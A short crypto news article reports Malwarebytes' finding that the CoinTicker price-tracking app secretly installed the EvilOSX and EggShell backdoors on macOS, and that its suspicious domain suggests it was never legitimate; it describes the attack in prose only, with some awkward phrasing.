Malwarebytes, a platform that protects users from malware, malicious websites and other advanced online threats, reported that 1vladimir, a contributor to the Malwarebytes forum, noted that the CoinTicker iOS app used to monitor cryptocurrency prices was privately by installing two different backdoors on computers.
The report also stated that the app did not show any kind of malicious activity, so a user will regularly use the app without realizing that they are vulnerable to being hacked. After the installation, the CoinTicker app will allow users to select those cryptocurrencies to track prices for. Some of the major cryptocurrencies include Bitcoin [BTC], Ethereum [ETH]and Monero [XMR].
In addition, a small widget will be added to the macOS menu bar that updates the prices as they fluctuate. Once the application is installed on the computer, CoinTicker is used to download EvilOSX and EggShell which are open source backdoors.
After installation, a customized version of the EggShell server is downloaded to macOS with the help of shell commands. Although the goal of the hacker behind the use of this malware is still unclear, both EggShell and EvilOSX are backdoors that can be used to gain access to the cryptocurrency of users to steal the cryptocurrency.
The report states that this may have been a potential attack on the supply chain, in which the creator and the application itself are legitimate, but the website is violated by a third party to spread a malicious version of the app .
Further inquiries have revealed that the app has never been legitimate in the first place. This is because the domain name of the application is "coin-sticker.com" which is not the same as the application name. According to the report, a wrong domain name was something that was "terribly sloppy" if it was a legitimate app.
Furthermore, the domain name was registered only a couple of months ago, which created further suspicions. The report also added that malware does not require root permission, while there is usually inaccurate accuracy on the need for root privilege malware. In contrast, this malware is an example of the fact that they do not need root privileges to have a high potential for danger.
Subscribe to the AMBCrypto newsletter